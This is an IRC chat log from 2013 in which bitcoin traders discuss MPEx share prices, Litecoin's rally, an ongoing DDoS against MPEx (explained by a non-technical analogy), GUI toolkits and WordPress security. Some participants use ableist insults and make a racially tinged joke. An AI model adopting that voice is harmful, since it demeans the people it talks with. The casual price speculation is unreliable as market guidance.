07:20:08 !ticker m s.mpoe Mar 10 07:20:10 [MPEX:S.MPOE] 1D: 0.00067638 / 0.00074998 / 0.00075 (89317 shares, 66.99 BTC), 7D: 0.00067334 / 0.00074889 / 0.00078628 (10735832 shares, 8,040.01 BTC), 30D: 0.0006153 / 0.00068483 / 0.00078628 (58572634 shares, 40,112.83 BTC) Mar 10 07:20:11 !ticker m s.dice Mar 10 07:20:12 [MPEX:S.DICE] 1D: 0.00549999 / 0.00549999 / 0.0055 (1650 shares, 9.07 BTC), 7D: 0.00300001 / 0.00558182 / 0.006225 (392080 shares, 2,188.52 BTC), 30D: 0.00300001 / 0.00616213 / 0.0069 (3732756 shares, 23,001.75 BTC) Mar 10 07:20:15 there, that sorta thing Mar 10 07:20:19 !ticker m s.bbet Mar 10 07:20:20 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0015 / 0.00174357 / 0.00197 (80200 shares, 139.83 BTC), 30D: 0.0015 / 0.00178893 / 0.00197 (111808 shares, 200.02 BTC) Mar 10 07:24:55 gotcha… ok I have to admit, I think the shit futures/options/derivatives are gonna make a number of folks very rich, I wish we could leave all that baggage behind is in the fiat world. We don't need wall street and hedge funds and institutional folks to "help us along" Mar 10 07:25:10 brb Mar 10 07:25:11 uhm Mar 10 07:25:27 how do you expect btc to work without financial instruments. Mar 10 07:25:57 just because your master stripped you naked and beat you with a whip doesn't mean there's no need for whips in this new state you're making "for freedom". Mar 10 07:26:01 they have their utility. Mar 10 07:31:17 fair enough… they have their utility. Mar 10 07:33:14 http://coinlab.com/ Mar 10 07:33:20 some serious resistance this is Mar 10 07:35:28 meh… guessing price is gonna need to consolidate a bit.. before it can go up again Mar 10 07:35:46 could collapse too… Mar 10 07:36:32 it's had an amazing run… (I think it's not gonna collapse below 20 or so… but that's just me).. I think it has huge potential Mar 10 07:36:56 but Mar 10 07:37:34 I've starting thinking about things in btw… not USD… it's hard Mar 10 07:38:46 how do i get post access on bitcointalk?? Mar 10 07:39:28 I get "be odd on newbie: but that's %^&ing retarded. Mar 10 07:39:34 err ocd Mar 10 07:40:14 ok my typing has suffered tonight as I drank a bottle of manzanilla Mar 10 07:40:43 bgupta I think you make 5 posts on the newbie section Mar 10 07:41:39 the-bucket-shop: Like mods are retards x 5? Mar 10 07:42:29 hard to post there… Mar 10 07:42:31 no, I would add +1 to each retard mod. multiplying will put you way over Mar 10 07:43:42 ok now have posted two Mar 10 07:45:13 [BTCTC] [GSDPT] 1 @ 0.0056 BTC [-] Mar 10 07:45:16 [BTCTC] [GSDPT] 1 @ 0.0056 BTC [-] Mar 10 07:45:52 now post three Mar 10 07:45:54 you can skip the updates, try to keep this room on point Mar 10 07:46:08 sorry… Mar 10 07:47:23 although (sidetracked now)… They probably don't Mar 10 07:49:01 whats up with LTC Mar 10 07:49:02 wtf Mar 10 07:49:55 problems in the litecoin community? I don't follow the news there, but would love to hear complaints if any. Mar 10 08:00:48 ;;eightball Will LTC crash? Mar 10 08:00:48 The outlook is good. Mar 10 08:03:06 ;;ticker Mar 10 08:03:07 BTCUSD ticker | Best bid: 47.34445, Best ask: 47.50000, Bid-ask spread: 0.15555, Last trade: 47.50000, 24 hour volume: 51372.27442917, 24 hour low: 43.70101, 24 hour high: 47.95000, 24 hour vwap: 46.15373 Mar 10 08:03:10 ltc will go wonky one way or another when all the gnu miners drop out of btw and point at ltc. Mar 10 08:04:02 ahh my huge roast is in the oven Mar 10 08:04:17 huuuuuge Mar 10 08:05:41 roast what? Mar 10 08:06:30 a 2lb pork chop Mar 10 08:08:32 ;;eightball Will LTC rise in value? Mar 10 08:08:32 _I_ don't know. Mar 10 08:10:36 [MPEX] [S.DICE] 500 @ 0.005884 = 2.942 BTC [+] Mar 10 08:14:37 bgupta, doesn't mining difficulty push coin value up with it? Mar 10 08:15:06 Bowjob.. a big chunk of BTC miners are gonna be mining LTC so... Mar 10 08:15:31 yes and no Mar 10 08:15:57 supply and demand is what ultimately drives value Mar 10 08:16:18 demand just deals with one end of that equation. Mar 10 08:16:52 err difficulty just deals with one end of that equation.. and that's supply. Mar 10 08:19:07 ltc has a use just in that you can play it against btc Mar 10 08:19:20 then you have litecoinglobal.com Mar 10 08:19:34 where there are btc and ltc-denominated assets Mar 10 08:20:05 so I here Mar 10 08:20:08 hear Mar 10 08:20:09 as long as people mostly stay focused on 1 alt-coin, it will do well Mar 10 08:20:10 aite boys and girls. laters! Mar 10 08:20:21 dev coins. Mar 10 08:20:30 are wack Mar 10 08:20:33 hehe Mar 10 08:20:39 i was like dev coins what? **** BEGIN LOGGING AT Sun Mar 10 14:37:35 2013 Mar 10 14:39:02 !ticker m ^oix Mar 10 14:39:03 [HAVELOCK] [HIM] 2 @ 1.75 = 3.5 BTC [+] Mar 10 14:39:04 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 40.86787592 / 49.80381297 / 50.5311083 (no shares, 17,228.61 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 10 14:39:09 ;;ticker Mar 10 14:39:09 BTCUSD ticker | Best bid: 47.28030, Best ask: 47.30009, Bid-ask spread: 0.01979, Last trade: 47.30009, 24 hour volume: 38523.58082220, 24 hour low: 44.30000, 24 hour high: 47.95000, 24 hour vwap: 46.52796 Mar 10 14:44:51 [BTCTC] [ASICMINER-PT] 1 @ 0.705 BTC [-] Mar 10 14:53:32 ok so : jurov's coinbr has been nuked too, for the 2nd time. working on maximian's idea atm, probably back online soon. Mar 10 14:53:38 3rd generation, here we come. Mar 10 14:55:59 [BTCTC] [S.MPOE-PT] 99 @ 0.000725 = 0.0718 BTC [+] Mar 10 14:56:01 [BTCTC] [S.MPOE-PT] 38 @ 0.000725 = 0.0276 BTC [+] Mar 10 15:05:21 ;;seen ineedausername Mar 10 15:05:22 I have not seen ineedausername. Mar 10 15:11:41 It's perhaps discussed already... but why not a MPEX proxy as TOR hidden service? Mar 10 15:16:49 [BTCTC] [ASICMINER-PT] 4 @ 0.7 = 2.8 BTC [-] Mar 10 15:18:01 AndChat567216 the concern is that may cause trouble to tor. Mar 10 15:18:04 but it's being worked on Mar 10 15:19:02 [HAVELOCK] [SDICE] 2 @ 0.6 = 1.2 BTC [+] Mar 10 15:24:46 [BTCTC] [S.BBET-PT] 25 @ 0.00194 = 0.0485 BTC [-] Mar 10 15:50:12 !ticker m s.dice Mar 10 15:50:13 [MPEX:S.DICE] 1D: 0.005884 / 0.005884 / 0.005884 (500 shares, 2.94 BTC), 7D: 0.00300001 / 0.00557643 / 0.006225 (387228 shares, 2,159.35 BTC), 30D: 0.00300001 / 0.00616219 / 0.0069 (3723806 shares, 22,946.81 BTC) Mar 10 15:50:45 !ticker m s.bbet Mar 10 15:50:46 [MPEX:S.BBET] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0015 / 0.00174357 / 0.00197 (80200 shares, 139.83 BTC), 30D: 0.0015 / 0.00178893 / 0.00197 (111808 shares, 200.02 BTC) **** BEGIN LOGGING AT Sun Mar 10 17:29:23 2013 Mar 10 17:29:59 Chooser starting his own gambling/shares site? https://bitcointalk.org/index.php?topic=151470.msg1607522#msg1607522 Mar 10 17:30:02 is there someone i can bug to process manual withdrawals from BTCT/LTCglobal Mar 10 17:30:04 that's the spirit Mar 10 17:30:14 ThickAsThieves burnside Mar 10 17:30:27 he's the only one :/ Mar 10 17:31:31 ltc at .0785 alrdy Mar 10 17:31:40 oops Mar 10 17:31:42 .00785 Mar 10 17:32:48 ;;calc .00785 * 45 Mar 10 17:32:49 0.35325 Mar 10 17:32:53 heh srsly ?! Mar 10 17:33:07 it went up 10% in 10min Mar 10 17:33:32 at this rate you gonna have to update that bitbet proposition soon Mar 10 17:33:52 or make another bet Mar 10 17:34:00 "ltc will be woth more than btc" Mar 10 17:34:05 i'm gonna get all the ltc kiddies betting on it Mar 10 17:36:00 lol Mar 10 17:36:12 is there a ltc chart like bitcoincharts anywhere ? Mar 10 17:36:21 dunno Mar 10 17:36:25 all i have i 5min chart Mar 10 17:36:33 lol sux Mar 10 17:37:00 https://btc-e.com/exchange Mar 10 17:37:04 ltc/btc Mar 10 17:37:15 action realtime Mar 10 17:37:31 i can't believe they dion't have a chart system Mar 10 17:37:37 http://www.ltc-charts.com/period-charts.php?period=today&resolution=hour&pair=ltc-btc&market=btc-e Mar 10 17:37:43 its a little wonky Mar 10 17:37:59 a a Mar 10 17:38:00 ty Mar 10 17:38:05 np Mar 10 17:40:43 rally is pulling back Mar 10 17:41:12 i sold 1050 ltc for 7.5btc :) Mar 10 17:42:21 well done. Mar 10 17:42:23 wouldve been another 3000 if burnside did use Flintstone withdrawal method Mar 10 17:42:32 lol Mar 10 17:42:39 http://www.cryptocoincharts.info/period-charts.php?period=2-days&resolution=hour&pair=ltc-btc&market=btc-e Mar 10 17:42:55 lol Mar 10 17:43:42 same chart but for black people? Mar 10 17:43:56 yep, black is cooler Mar 10 17:44:10 lol black is what the pros use! Mar 10 17:44:25 i have too many other windows that are white Mar 10 17:44:35 kills my eyes to flip back and forth Mar 10 17:44:57 i guess if i had more monitors i could set up some for charts Mar 10 17:45:04 but i still have a day job Mar 10 17:45:06 for now Mar 10 17:45:18 dump dat shit Mar 10 17:45:25 tough to, Mar 10 17:45:31 it's my own business Mar 10 17:45:37 and ive pared it down a lot Mar 10 17:45:53 but still serve about 60 websites and 25 clients as designer Mar 10 17:46:01 then some adwords account mgmt Mar 10 17:46:03 [HAVELOCK] [HIM] 1 @ 1.75 BTC [+] Mar 10 17:46:07 you are a designer? Mar 10 17:46:11 yessir Mar 10 17:46:18 got a portfolio? Mar 10 17:46:33 why are there still designers? we have bootstrap Mar 10 17:46:39 i do mostly branding stuff Mar 10 17:46:48 web design occassionally Mar 10 17:47:00 my portfolio are all busted atm Mar 10 17:47:02 [HAVELOCK] [SDICE] 1 @ 0.60499998 BTC [-] Mar 10 17:47:14 i put up a new wordpress site that wasnt finished Mar 10 17:47:33 what kind of design are you looking for? i could dig up relavant samples Mar 10 17:47:42 lol... everybody use basic bootstrap only! A la GLBSE. Mar 10 17:47:46 relevant* Mar 10 17:48:08 fucking bootstrap Mar 10 17:48:22 i'd rather see bootstrap than a lot of other shit Mar 10 17:48:30 did you get your portofolio ddosed ? Mar 10 17:48:34 I prefer hand coded website Mar 10 17:48:36 the newest version of foundation actually looks nice Mar 10 17:48:43 Namworld: isn't worth it anymore Mar 10 17:48:46 no, cuz i havent linked to it here yet mp Mar 10 17:48:49 too many flakey devices that get css wrong Mar 10 17:49:14 ltc:) Mar 10 17:49:21 i dont do any programming other than tertiary stuff Mar 10 17:49:25 some server mgmt Mar 10 17:49:33 ThickAsThieves: you should Mar 10 17:49:36 its good for you Mar 10 17:49:38 i know Mar 10 17:49:39 teaches you how to think Mar 10 17:49:45 What? How would it not be worth it? Mar 10 17:49:51 i have so many projects already Mar 10 17:49:55 Namworld: I just told you why Mar 10 17:50:10 ive been learning plenty Mar 10 17:50:13 That's not even a good reason. Mar 10 17:50:18 just not programming Mar 10 17:50:38 Namworld: if you want your website to look correct on every device ever, yes, it is a good reason Mar 10 17:51:02 The same can be done manually... Mar 10 17:51:12 yes, if you OWN every device ever Mar 10 17:51:23 Plus bootstrap doesn't support everything... Mar 10 17:51:33 bootstrap supports everything worthwhile Mar 10 17:52:04 oh geez Mar 10 17:52:06 and supports a lot of older mobile browsers that really should just be tossed in the trash Mar 10 17:52:17 Same can be done manually... Mar 10 17:52:24 not reliably Mar 10 17:52:45 dude, I've written frameworks like bootstrap and foundation before, you haven't Mar 10 17:52:50 $vwap Mar 10 17:52:52 ThickAsThieves: http://pastebin.com/q5kdCh3m Mar 10 17:52:59 its a pain in the fucking ass, and not worth wasting your time on Mar 10 17:53:16 if a team wants to dedicate their shitty little lives to it, let them, it saves me the time of having to hit phones with hammers until they work Mar 10 17:54:03 and what are your feelings on Wordpress Mar 10 17:54:07 dare i ask Mar 10 17:54:17 ThickAsThieves: I fucking hate it and I'm seriously considering replacing mine with a static blog Mar 10 17:54:49 do like some git cron job or something Mar 10 17:54:58 you hate it personally, and/or you think others shouldn't use it? Mar 10 17:55:05 ThickAsThieves: yes Mar 10 17:55:09 hehe Mar 10 17:55:14 Ive ran a wordpress blog for like 7 or 8 years now Mar 10 17:55:20 it makes me hate php more and more Mar 10 17:55:25 like all my clients use it for their small biz sites Mar 10 17:55:28 so many hax Mar 10 17:55:35 ThickAsThieves: they shouldn't, its a security hazard Mar 10 17:55:42 i hate it now Mar 10 17:55:46 this is why I run it on an isolated vps Mar 10 17:55:48 i mean i dont mind using it Mar 10 17:55:51 but all the hax Mar 10 17:55:51 just so it can't fuck other shit up Mar 10 17:55:56 so hard to explain to a plumber Mar 10 17:56:06 ThickAsThieves: its easy to explain to a plumber Mar 10 17:56:30 "wordpress is written in php, php makes it easy for you to write code wrong so hackers can come in and fuck your website up" Mar 10 17:56:35 "but why would they do this?" Mar 10 17:56:44 "because they're assholes, Bob, they're assholes" Mar 10 17:56:46 because its free Mar 10 17:57:08 his name is actually Bob, lol Mar 10 17:57:14 plumbers are always named Bob Mar 10 17:57:22 its a rule Mar 10 17:57:42 if you name your kid bob, he will grow up to either be a plumber or an electrician Mar 10 17:57:57 What if you call him Robert Mar 10 17:58:04 mass murderer Mar 10 17:58:21 Bert the mass murderer, yep Mar 10 17:58:35 ... Mar 10 17:59:18 namworld is named Robert i guess Mar 10 17:59:27 but yeah, storing your blog statically in git and then outsourcing the comments to a service Mar 10 17:59:33 would really cut down on the bullshit Mar 10 17:59:55 clients want to edit their content in Word tho Mar 10 18:00:05 lots of sites i dont realize they have comments cause they use javascript to display them from a 3rd party service Mar 10 18:00:07 so? they can copy paste Mar 10 18:00:28 pigeons: er, except said 3rd party services email you on comment Mar 10 18:00:33 which is REALLY FUCKING ANNOYING Mar 10 18:00:52 unless they explicitly set it up as moderation, then thats fine Mar 10 18:01:06 that's why i use your email address Mar 10 18:01:23 lol but its gmail and gmail filters like a baus Mar 10 18:03:11 bwais Mar 10 18:07:13 lol Mar 10 18:08:48 [BTCTC] [S.DICE-PT] 32 @ 0.00564 = 0.1805 BTC [+] Mar 10 18:08:52 [BTCTC] [S.DICE-PT] 50 @ 0.00565 = 0.2825 BTC [+] Mar 10 18:08:54 [BTCTC] [S.DICE-PT] 300 @ 0.00567 = 1.701 BTC [+] Mar 10 18:08:56 [BTCTC] [S.DICE-PT] 10 @ 0.005709 = 0.0571 BTC [+] Mar 10 18:16:12 Is MPEx back on line/ Mar 10 18:16:15 ? Mar 10 18:16:29 Rick__: still only here on irc Mar 10 18:16:49 when will it be back on line? Mar 10 18:17:08 No one can know... it's being DDoS'ed Mar 10 18:17:30 Whenever however is DDoS'ing it stops. Mar 10 18:18:32 $ping Mar 10 18:18:33 pong Mar 10 18:19:57 mircea cant do anything with the "ddos"? Mar 10 18:20:18 what if the ddosing wont stop? Mar 10 18:20:50 i'm working on bringing mpex.coinbr.com onlinw with amazing powers Mar 10 18:20:57 hopefully others, too Mar 10 18:21:41 looking forword to have mpex.coinbr.com back Mar 10 18:22:25 Amazing amazonian powers? Mar 10 18:23:12 Rick__ as i said, there;'s more hardware coming online, and meanwhile trading works through the bots Mar 10 18:23:19 have you been reading the forum updates ? Mar 10 18:23:52 also possibly of interest to you, FabianB has released an equivalent of pympex capable of going through the irc bots Mar 10 18:24:19 mircea_popescu: would you mind if '$vwap s.dice' returned what one might expect? Mar 10 18:24:31 not at all Mar 10 18:24:32 same with $depth s.dice Mar 10 18:24:58 ooh, what's this FabianB thing? Mar 10 18:25:22 https://github.com/fawuxi/mpex Mar 10 18:25:26 smickles: it's like pympex Mar 10 18:25:47 just a little smoother interface, more features and can talk to the irc bots Mar 10 18:25:58 someone's gonna one day make a gui Mar 10 18:25:59 as alternative to the http api Mar 10 18:27:13 smickles also of possible interest to you Mar 10 18:27:44 I want a GUI... Mar 10 18:27:52 Mar 09 23:23:07 kakobrekla : can you make assbot ticker identifier to be hungry ? Mar 10 18:27:52 Mar 09 23:23:13 such as !ticker m C600T Mar 10 18:28:07 did you turn normal during your time away from irc smickles? Mar 10 18:28:30 mircea,I can read English,but lots of computer things I dont understand,it's very diffcult for me Mar 10 18:28:53 Rick__ ok. basically, don't panic, we're working on it. even if ddos never stops. Mar 10 18:29:26 Rick__: do you need some trades executed now? Mar 10 18:29:39 nope Mar 10 18:29:46 just care about the website Mar 10 18:30:15 yes, we all cared about her, she's very pretty Mar 10 18:30:19 lol Mar 10 18:30:27 I invest hundreds of coin in it Mar 10 18:30:32 for all the hate that website got, seriously. Mar 10 18:31:17 so basicly,when will it be back on line?do you have a schedule? Mar 10 18:31:20 Rick__ do you understand how ddos works ? Mar 10 18:31:35 nope,not at all Mar 10 18:31:39 want me to explain ? Mar 10 18:31:50 problem with GUIs is that its majority of users are ms windows users Mar 10 18:31:54 If you thing I can understand Mar 10 18:32:08 think Mar 10 18:32:14 Rick__ ok lets see. suppose you have a shop somewhere. you make ok money selling things in your shop. Mar 10 18:32:29 yeah Mar 10 18:32:29 one day a customer comes in and says "hi i want to buy a carrot". Mar 10 18:32:38 your shop doesn't sell carrots. you tell him this. he leaves. Mar 10 18:32:45 this is no big deal, really, mistakes happen. Mar 10 18:33:03 the next day, 167`855`212 peopel come to your shop. each of them goes "hi i want to buy a carrot". Mar 10 18:33:11 the queues reach as far as the next town Mar 10 18:33:23 the police wants to fine you because your shop is blocking the traffic Mar 10 18:33:28 okay,that's making sence Mar 10 18:33:31 what can you do ? Mar 10 18:33:39 when will your shop be back taking normal orders ? Mar 10 18:33:52 shut the shop down? Mar 10 18:33:58 well that's not very good is it ? Mar 10 18:34:16 yeah,want shot somebody! Mar 10 18:34:21 hehe. Mar 10 18:34:37 ok so, what you do is either make a much larger shop, or make the shop location secret, or both. Mar 10 18:34:47 i am doing both. however, building a supermarket is not instantaneous. Mar 10 18:35:04 so the carrot here,what exacly the hacker do , Mar 10 18:35:06 okay Mar 10 18:35:09 it should have been online by yest, but we ran into supplier problems. that's detailed here : Mar 10 18:35:42 https://bitcointalk.org/index.php?topic=138956.msg1601667#msg1601667 Mar 10 18:35:47 read the messages from there on. Mar 10 18:36:01 okay,thank you very much Mar 10 18:36:03 np. Mar 10 18:37:06 FabianB hey, does opengl work on windoze ? Mar 10 18:37:16 yes Mar 10 18:37:30 is there opengl gui lib for py/perl ? Mar 10 18:38:19 dunno, i've played with OGLE for capturing geometry Mar 10 18:38:46 mircea_popescu: probably, but opengl is good for games and maybe charts, but not so much for normal guis Mar 10 18:38:58 o really ?! Mar 10 18:39:06 why not ? Mar 10 18:39:24 mircea_popescu: it's useful for 3D stuff etc. Mar 10 18:39:42 FabianB: looks nice, and good thing to add the ability to go via IRC :) Mar 10 18:39:42 i understand that, but i mean... if it can do that why couldn't it do some window boxes Mar 10 18:40:06 mircea_popescu: did kako say he wasn't going to make assbot 'hungry'? Mar 10 18:40:20 sure you can, but it's easier to do GUIs with QT, GTK, Cocoa or Windows native stuff Mar 10 18:40:21 !ticker m P470T Mar 10 18:40:23 [MPEX:O.BTCUSD.P470T] 1D: 0.14289205 / 0.14375761 / 0.14485191 (5000 shares, 718.79 BTC), 7D: 0.14289205 / 0.14708052 / 0.18400178 (5450 shares, 801.59 BTC), 30D: 0.14289205 / 0.18072094 / 0.58814383 (5900 shares, 1,066.25 BTC) Mar 10 18:40:34 FabianB a ok Mar 10 18:40:43 yes opengl doesn't have some of the same positioning microsoft's directx has, but opengl is ued on windows Mar 10 18:41:12 i was just thinking one could make a single codebase that's then independently compilable by os Mar 10 18:41:13 qt and gtk are kinda cross OS too; packaging is some work though for windows Mar 10 18:41:16 but maybe that isn't the best way Mar 10 18:41:31 !help Mar 10 18:41:32 List of commands: Mar 10 18:41:33 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 10 18:41:34 !mp (desc: returns the response from MPEX order) Mar 10 18:41:40 mircea_popescu: the code can be done in a single codebase, but not the packaging Mar 10 18:42:04 ncurses Mar 10 18:42:13 FabianB well if you use win stuff for instance, that won't be compilable in linux Mar 10 18:42:16 lol ncurses Mar 10 18:42:40 if mpex gui ends up as a wine supported thing ima shoot myself Mar 10 18:43:11 yeah wine has a lib for exactly that, building cross-platform gui apps Mar 10 18:43:24 somebody just mentioned it here :p Mar 10 18:43:25 lol, opengl. Let's make a 3d gui for mpex. heh, or maybe something like a minecraft interface to mpex :D Mar 10 18:43:28 that's why i said Mar 10 18:43:37 smickles hey, didn't you have a minecraft server ? Mar 10 18:44:16 thank you mircea that was really illuminating:"the next day, 167`855`212 peopel come to your shop. each of them goes "hi i want to buy a carrot". Mar 10 18:44:23 gabridome :p Mar 10 18:44:55 Well that's pretty much what a DDoS is. Mar 10 18:44:57 i could go for telnet to an mpex mud Mar 10 18:44:58 mircea_popescu: yeah, i've got a minecraft server Mar 10 18:45:10 Except the people are mindless zombies controlled by a hacker. Mar 10 18:45:19 well, it's tekkit, specifically Mar 10 18:45:26 smickles what do you want to build a mpex hq on minecraft ? Mar 10 18:45:32 and we'll probably move to feed the beast Mar 10 18:45:32 complete with being able to put in orders ? Mar 10 18:45:42 pigeons make it! Mar 10 18:45:56 heh, could be fun Mar 10 18:46:00 indeed lol Mar 10 18:46:08 i might even try out minecraft for this Mar 10 18:46:28 Namworld i should have said "voters" shouldn't i have. Mar 10 18:48:02 [HAVELOCK] [SDICE] 1 @ 0.60399999 BTC [-] Mar 10 18:48:07 the thing about minecraft mods is, text based ones are quick and easy, in-game gui ones are a bit tougher, and 'in-game in-game' ones take a lot of time Mar 10 18:48:53 and a text one would be useless because it be like irc, but take longer open Mar 10 18:49:02 [HAVELOCK] [SDICE] 4 @ 0.604 = 2.416 BTC [+] Mar 10 18:50:03 [HAVELOCK] [SDICE] 1 @ 0.60499995 BTC [+] Mar 10 18:50:19 [BTCTC] [ASICMINER-PT] 4 @ 0.72 = 2.88 BTC [-] Mar 10 18:50:36 smickles it's nothing but fun side-project really Mar 10 18:50:46 if you ever felt like getting into game-making this'd be a great in Mar 10 18:51:03 [HAVELOCK] [SDICE] 1 @ 0.60499997 BTC [+] Mar 10 18:53:17 I did make a minecraft market mod which allowed players to buy and sell items/blocks at prices based on server-wide demand Mar 10 18:53:26 well java would be cross platform too, but no-one likes java guis (both users and developers) Mar 10 18:53:38 ugly things those are Mar 10 18:53:41 java is evil. Mar 10 18:53:47 BUT Mar 10 18:53:58 because of the way mpex works, the worst that can happen isn't really too bad at all Mar 10 18:54:14 ;;ticker Mar 10 18:54:14 BTCUSD ticker | Best bid: 47.30807, Best ask: 47.39936, Bid-ask spread: 0.09129, Last trade: 47.40000, 24 hour volume: 33231.78608909, 24 hour low: 45.23481, 24 hour high: 47.95000, 24 hour vwap: 46.88175 Mar 10 18:54:44 smickles "a lot of work" is it because you need art made ? Mar 10 18:55:45 naw, minecraft art is simple stuff, the issue is fitting it into play in a way that makes sence Mar 10 18:55:46 and on top: GUIs attract people that need a lot of support; telling someone to type XY into a commandline is easy (can be copy/pasted); telling someone to first click on Y, type X and point the mouse to Z is cumbersome Mar 10 18:55:48 [MPEX] [S.DICE] 499 @ 0.005884 = 2.9361 BTC [+] Mar 10 18:55:54 [MPEX] [S.DICE] 7176 @ 0.00588401 = 42.2237 BTC [+] Mar 10 18:55:57 [MPEX] [S.DICE] 9410 @ 0.00593938 = 55.8896 BTC [+] Mar 10 18:55:59 [MPEX] [S.DICE] 5415 @ 0.00598314 = 32.3987 BTC [+] Mar 10 18:56:01 ;;ident Mar 10 18:56:02 You are not identified. Mar 10 18:56:14 FabianB this is very true Mar 10 18:56:34 gui is really a stupid way to interact with numeric machines, but hey. Mar 10 18:56:42 what about a javascript platform? security not enough? Mar 10 18:57:00 gabridome security is not an issue really, because the messaging itself is encrypted Mar 10 18:57:03 gabridome: already exists: coinbr.com Mar 10 18:57:08 the only concern is not losing the user's gpg keys Mar 10 18:57:44 I use WebPG Mar 10 18:58:21 as long as it doesn't get cracked. Mar 10 18:58:29 just make the gui look exactly like bitcoinica did Mar 10 18:58:51 ;;sell 20 btc @ 49.82 usd Mar 10 18:58:52 Order id 13941 created. Mar 10 18:59:03 yeah. And there's also the esclamation point issue I couldn't deal with probably.. Mar 10 18:59:06 ;;ticker Mar 10 18:59:07 BTCUSD ticker | Best bid: 47.35000, Best ask: 47.40000, Bid-ask spread: 0.05000, Last trade: 47.35000, 24 hour volume: 33191.53570187, 24 hour low: 45.23481, 24 hour high: 47.95000, 24 hour vwap: 46.88337 Mar 10 18:59:18 aww i thought we're at 49.x Mar 10 19:00:34 good thing i did the IRC extension, coz it made me implement the interactive mode; very nice to work with mpex in its own shell Mar 10 19:01:03 i actually think there is a new business model being born here. Mar 10 19:01:05 is it easy to install ruby on Mac? Mar 10 19:01:23 offer saas to mpex users : give them a fixed ip vps and handle support for mpex connectivity Mar 10 19:01:25 gabridome: it's shipped with mac, but old version and yes it's easy Mar 10 19:01:27 charge whatever Mar 10 19:01:59 thanks. Will give it a try Mar 10 19:03:09 [BTCTC] [S.DICE-PT] 5 @ 0.00591 = 0.0296 BTC [+] Mar 10 19:04:30 damn, litecoin Mar 10 19:06:56 ThickAsThieves looks like its live http://bitbet.us/bet/297/litecoin-surges-to-02-bitcoins-per-litecoin/ Mar 10 19:07:42 [BTCTC] [S.DICE-PT] 5 @ 0.00591 = 0.0296 BTC [+] Mar 10 19:10:35 [BTCTC] [S.MPOE-PT] 62 @ 0.000725 = 0.045 BTC [+] Mar 10 19:10:37 [BTCTC] [S.MPOE-PT] 1 @ 0.000725 BTC [+] Mar 10 19:13:09 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 10 19:13:22 coinbr.com looks like down. Is it? Mar 10 19:13:41 litecoin at 35 cents Mar 10 19:13:42 damn Mar 10 19:16:43 still cant get my withdrawal from burnside... Mar 10 19:19:31 http://bitbet.us/bet/298/mpex-co-still-offline-friday-march-15th/ lmao Mar 10 19:19:38 who's the smartass Mar 10 19:21:30 FabianB:upgraded last version with brew (1.8.7) and tryed to install but:ERROR: Error installing mpex: ERROR: Failed to build gem native extension. Don't want to spam the channel but could you give me a way to support? Mar 10 19:22:30 [BTCTC] [S.DICE-PT] 25 @ 0.005905 = 0.1476 BTC [-] Mar 10 19:22:43 what;'s the logfiles say ? Mar 10 19:24:14 mircea_popescu: that look like a challenge. I'ignore it Mar 10 19:24:25 I'd ignore it Mar 10 19:24:42 lol. but seriously, it probably spits out something more useful in a log somewhere. Mar 10 19:25:08 you're prolly missing some itam. Mar 10 19:25:32 I'llgo find the logs... Mar 10 19:27:27 [BTCTC] [BTC-BOND] 1 @ 0.009989 BTC [-] Mar 10 19:27:48 xcode-select: Error: No Xcode is selected. Use xcode-select -switch , or see the xcode-select manpage (man xcode-select) for further information. Mar 10 19:30:22 da fuck is xcode Mar 10 19:31:25 apple's compiler/environment whatever Mar 10 19:33:20 ?m downloading the new version right now Mar 10 19:34:23 mircea_popescu: what's vsa again? Mar 10 19:34:30 yeah use a computer not an apple Mar 10 19:34:50 smickles volume in satoshi Mar 10 19:34:52 well an apple II is a computer, but not a imacbook Mar 10 19:34:57 thx :) Mar 10 19:35:08 pigeons so a sort of borland pascal ? Mar 10 19:35:36 TURBO pascal Mar 10 19:35:45 heh i think pastebin.com is getting ddosed too. Mar 10 19:36:19 Delphi++ Mar 10 19:38:23 gabridome: as the readme says you need ruby > 1.9 or 2.0 Mar 10 19:38:34 ok, it's privitive, but it's there: Mar 10 19:38:38 $help vwap Mar 10 19:38:39 smickles: (vwap []) -- Returns a pastebin link with all available market data, excepting depth. If an MPSIC is specified, returns only the data relevant to that MPSIC in IRC. Mar 10 19:38:43 $help depth Mar 10 19:38:44 smickles: (depth []) -- Returns the full market depth. If an MPSIC is specified, returns only the depth of the specified MPSIC. Mar 10 19:39:10 nice Mar 10 19:39:21 $depth Mar 10 19:39:25 benkay: http://pastebin.com/pNPn50Nk Mar 10 19:39:48 benkay: there is also $post to send mpex commands, if you didn't know already ;) Mar 10 19:39:55 i am familiar Mar 10 19:39:57 thank you Mar 10 19:40:08 do you have a moment to answer some rando questions, smickles? Mar 10 19:40:20 go ahead :) Mar 10 19:42:39 what is the air speed velocity of an african swallow? Mar 10 19:42:46 unswallowed ? Mar 10 19:43:00 do you like gladiator movies? Mar 10 19:43:29 how many memes are there ? Mar 10 19:43:51 hmm, smickles has failed to answer our questions. this is clearly a scam Mar 10 19:44:08 there has been a full minute elapsed already. Mar 10 19:47:05 philosophically speaking from a radical skepticism point of view, the answer to all of those is "i don't know" Mar 10 19:47:07 $post U4KC19nM Mar 10 19:47:08 :P Mar 10 19:47:12 mircea_popescu: http://pastebin.com/5ZNPXqdz Mar 10 19:50:11 it's official, mpex is using new signature Mar 10 19:50:24 3D57448E80A56F64F1D35E8F14460196CFE0F3E1 / CFE0F3E1 Mar 10 19:50:32 so mp, doing any LTC mpex soon Mar 10 19:50:33 make sure you update if you haven't already. Mar 10 19:50:37 Bowjob nah Mar 10 19:50:44 i find it baffling it reaches 35 cents Mar 10 19:50:55 mania. Mar 10 19:51:04 considering it's a get rich quick Mar 10 19:51:10 scheme.. Mar 10 19:51:21 heck they openly admitted it on litecoin.org until recently Mar 10 19:51:22 lol Mar 10 19:54:49 ozcoin is already #2 pool Mar 10 19:54:56 so much for that bet maturing Mar 10 19:56:03 ThickAsThieves http://blockchain.info/pools?timespan=4days conspicuously absent Mar 10 19:57:26 ;;getrating benkay Mar 10 19:57:28 This user has not yet been rated. Currently authenticated from hostmask benkay!~benkay@c-71-193-200-93.hsd1.or.comcast.net . Mar 10 19:57:39 hence my request :) Mar 10 19:57:45 ;;rate benkay 1 mpex socket subscriber Mar 10 19:57:46 Rating 